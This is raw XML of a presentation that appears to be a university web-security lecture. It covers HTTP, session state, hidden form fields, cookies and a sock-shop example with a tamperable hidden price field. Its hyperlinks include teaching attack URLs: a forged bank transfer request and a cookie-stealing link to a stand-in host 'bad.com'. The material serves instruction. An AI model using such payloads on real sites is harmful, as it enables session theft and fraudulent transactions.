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337" r:id="rId24"/>
    <p:sldId id="271" r:id="rId25"/>
    <p:sldId id="272" r:id="rId26"/>
    <p:sldId id="273" r:id="rId27"/>
    <p:sldId id="274" r:id="rId28"/>
    <p:sldId id="275" r:id="rId29"/>
    <p:sldId id="290" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="294" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="296" r:id="rId35"/>
    <p:sldId id="302" r:id="rId36"/>
    <p:sldId id="303" r:id="rId37"/>
    <p:sldId id="304" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="306" r:id="rId40"/>
    <p:sldId id="308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6" r:id="rId5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8" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="62" d="100"/>
          <a:sy n="62" d="100"/>
        </p:scale>
        <p:origin x="-1128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80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1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7" name="Shape 8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6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5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1" name="Shape 6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8" name="Shape 7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6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3767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228850"/>
            <a:ext cx="11099800" cy="6639025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl2pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:defRPr sz="3300"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="2700"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="2700"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"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84821" indent="-384821">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef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1500"/>
              </a:spcBef>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef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cks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ve.wsj.com/video/how-advertisers-use-internet-cookies-to-track-yo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ank.com/transfer.cgi?amt=9999&amp;to=attack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hyperlink" Target="http://bank.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bank.co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bank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mmazurek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bank.com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://bank.co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bank.com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://bank.com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victim.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bad.com/steal?c=" TargetMode="Externa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piderman-1.jpg" descr="spiderman-1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561016" y="637976"/>
            <a:ext cx="7883097" cy="5912322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Web security I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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> I</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="With material from Dave Levin, Mike Hicks, Lujo Bauer, Collin Jacks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With material from Dave Levin, Mike Hicks, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Lujo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> Bauer, Collin </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Michelle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mazurek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Basic structure of web traff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Basic</a:t>
            </a:r>
            <a:r>
              <a:t> structure of web traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2780406" y="3071952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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8284408" y="3071952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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3154108" y="2434373"/>
            <a:ext cx="11925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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8586215" y="2434373"/>
            <a:ext cx="13363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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="529" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5023594" y="2731830"/>
            <a:ext cx="2957613" cy="651848"/>
            <a:chOff x="0" y="-55562"/>
            <a:chExt cx="2957612" cy="651846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="527" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="596284"/>
              <a:ext cx="29576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528" name="HTTP Request"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="42448" y="-55563"/>
              <a:ext cx="28727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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="User clicks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2565622" y="4541382"/>
            <a:ext cx="236955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User clicks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Responses contain:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763104" y="5508030"/>
            <a:ext cx="11478592" cy="3518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365230" indent="-365230" algn="l" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="313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Responses</a:t>
            </a:r>
            <a:r>
              <a:t> contain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="667962" lvl="1" indent="-281247" algn="l" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="313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Status</a:t>
            </a:r>
            <a:r>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="667962" lvl="1" indent="-281247" algn="l" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="313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Headers</a:t>
            </a:r>
            <a:r>
              <a:t> describing what the server provides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="667962" lvl="1" indent="-281247" algn="l" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="313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Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="667962" lvl="1" indent="-281247" algn="l" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="313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Cookies</a:t>
            </a:r>
            <a:r>
              <a:t> (much more on these later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1054677" lvl="2" indent="-281247" algn="l" defTabSz="508254">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3132"/>
            </a:pPr>
            <a:r>
              <a:t>Represent s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tate</a:t>
            </a:r>
            <a:r>
              <a:t> the server would like the browser to store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="534" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5023594" y="3942566"/>
            <a:ext cx="3208656" cy="651029"/>
            <a:chOff x="-125521" y="596284"/>
            <a:chExt cx="3208654" cy="651028"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="532" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="596284"/>
              <a:ext cx="29576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533" name="HTTP Response"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-125522" y="650412"/>
              <a:ext cx="320865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HTTP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6308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 animBg="1" advAuto="0"/>
      <p:bldP spid="531" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="53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HTTP respon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 responses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667000"/>
            <a:ext cx="8801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200" y="3802638"/>
            <a:ext cx="18288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Header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200" y="6309876"/>
            <a:ext cx="18288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ounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3911600" y="2867799"/>
            <a:ext cx="571845" cy="256401"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34772"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent5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987800" y="2278638"/>
            <a:ext cx="18288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Status code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00893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Adding state to the we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Adding state to the web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HTTP is statel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 is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stateless</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="The lifetime of an HTTP session is typically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3239"/>
            </a:pPr>
            <a:r>
              <a:t>The lifetime of an HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:t> is typically: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Client connects to the server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Client issues a request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Server responds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Client issues a request for something in the response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…. repeat ….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Client disconnects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t>No direct way to ID a client from a previous session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-400050" defTabSz="525779">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="3239"/>
            </a:pPr>
            <a:r>
              <a:t>So why don’t you have to log in at every page load?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Maintaining St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Maintaining State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Web application maintains ephemeral state…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="5162636"/>
            <a:ext cx="11099800" cy="3390486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Web application maintains </a:t>
            </a:r>
            <a:r>
              <a:rPr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ephemeral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 state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Server processing often produces intermediate results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>Send state to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3420"/>
            </a:pPr>
            <a:r>
              <a:t>Client returns the state in subsequent responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2779207" y="3228091"/>
            <a:ext cx="1939987" cy="142875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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438902" y="3173854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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3152909" y="2590512"/>
            <a:ext cx="11925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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8741004" y="2536275"/>
            <a:ext cx="13363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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="480" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4974720" y="3950757"/>
            <a:ext cx="3208656" cy="651848"/>
            <a:chOff x="-125521" y="-55562"/>
            <a:chExt cx="3208654" cy="651846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="478" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="596284"/>
              <a:ext cx="29576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479" name="HTTP Response"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-125522" y="-55563"/>
              <a:ext cx="320865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HTTP Response</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="483" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5100242" y="2951205"/>
            <a:ext cx="2957613" cy="651848"/>
            <a:chOff x="0" y="-55562"/>
            <a:chExt cx="2957612" cy="651846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="481" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="596284"/>
              <a:ext cx="29576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482" name="HTTP Request"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="42448" y="-55563"/>
              <a:ext cx="28727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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="State"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438902" y="4060557"/>
            <a:ext cx="962179" cy="596285"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 31948"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="12700" dist="127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State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="State"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603719" y="4060557"/>
            <a:ext cx="962178" cy="596285"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 31948"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="12700" dist="127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State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Two kinds of state: hidden fields, and cookies"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2390765" y="9058915"/>
            <a:ext cx="9147682" cy="59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spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>Two kinds of state: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hidden fields</a:t>
            </a:r>
            <a:r>
              <a:t>, and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cookies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71811 -0.000776" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="12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0133 -0.077179" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="4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133 -0.077179 L 0.304708 -0.076766" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="9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708 -0.076766 L 0.372022 -0.001170" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="4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1" build="p" animBg="1" advAuto="0"/>
      <p:bldP spid="480" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="480" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="483" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="483" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="484" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="484" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="485" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="486" grpId="1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Ex: Online ord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Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="495" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2222562" y="3521874"/>
            <a:ext cx="3553663" cy="3325504"/>
            <a:chOff x="0" y="-55562"/>
            <a:chExt cx="3553661" cy="3325502"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="489" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="17421"/>
              <a:ext cx="3553662" cy="3252520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490" name="Order"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1084575" y="-55563"/>
              <a:ext cx="138451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Order</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="491" name="socks.jpg" descr="sock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4105" y="1000245"/>
              <a:ext cx="1312922" cy="1286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2" name="$5.50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="415838" y="2245889"/>
              <a:ext cx="116945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rgbClr val="1333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$5.50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="493" name="Order"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1860240" y="1349392"/>
              <a:ext cx="1428752" cy="588578"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 32366"/>
              </a:avLst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Order</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="494" name="Arrow"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13812239">
              <a:off x="2881069" y="1799095"/>
              <a:ext cx="443313" cy="356876"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 32000"/>
                <a:gd name="adj2" fmla="val 85333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04" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6724973" y="2615037"/>
            <a:ext cx="4493977" cy="4253317"/>
            <a:chOff x="-470157" y="-55562"/>
            <a:chExt cx="4493976" cy="4253316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="502" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="872250"/>
              <a:ext cx="3553662" cy="3325504"/>
              <a:chOff x="0" y="-55562"/>
              <a:chExt cx="3553661" cy="3325502"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="496" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="17421"/>
                <a:ext cx="3553662" cy="3252520"/>
              </a:xfrm>
              <a:prstGeom prst="rect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BEBEB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/>
                </a:pPr>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="497" name="Pay"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1343697" y="-55563"/>
                <a:ext cx="866268" cy="596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>
                  <a:defRPr sz="340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r>
                  <a:t>Pay</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="498" name="The total cost is $5.50. Confirm order?"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="377238" y="968196"/>
                <a:ext cx="2799185" cy="68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/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="2000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="1333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The total cost is $5.50.</a:t>
                </a:r>
                <a:br/>
                <a:r>
                  <a:t>Confirm order?</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="499" name="Yes"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="259317" y="2136417"/>
                <a:ext cx="1428751" cy="588578"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 32366"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill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2200" b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Yes</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="500" name="Arrow"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="13812239">
                <a:off x="1318943" y="2587944"/>
                <a:ext cx="443314" cy="356875"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 32000"/>
                  <a:gd name="adj2" fmla="val 85333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1" name="No"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1880771" y="2136417"/>
                <a:ext cx="1428751" cy="588578"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 32366"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/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2200" b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No</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="503" name="socks.com/pay.php"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-470158" y="-55563"/>
              <a:ext cx="4493978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3400" u="sng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>
                  <a:hlinkClick r:id="rId3"/>
                </a:rPr>
                <a:t>socks.com</a:t>
              </a:r>
              <a:r>
                <a:t>/pay.php</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="socks.com/order.php"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493283" y="2615037"/>
            <a:ext cx="501222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u="sng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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>socks.com</a:t>
            </a:r>
            <a:r>
              <a:t>/order.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Separate page"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7487674" y="7129492"/>
            <a:ext cx="296857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Separate page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1" animBg="1" advAuto="0"/>
      <p:bldP spid="506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&lt;html&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354669" y="3680935"/>
            <a:ext cx="8149630" cy="4051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&lt;html&gt;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&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;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&lt;body&gt;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&lt;form action=“submit_order” method=“GET”&gt;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The total cost is $5.50. Confirm order?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type=“hidden” name=“price” value=“5.50”&gt;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type=“submit” name=“pay” value=“yes”&gt;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type=“submit” name=“pay” value=“no”&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Ex: Online ord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Ex: Online ordering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="What’s presented to the user"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502713" y="2342055"/>
            <a:ext cx="599937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What’s presented to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2353733" y="5676851"/>
            <a:ext cx="8518545" cy="385719"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 49388"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr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" name="pay.php"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9377917" y="3258156"/>
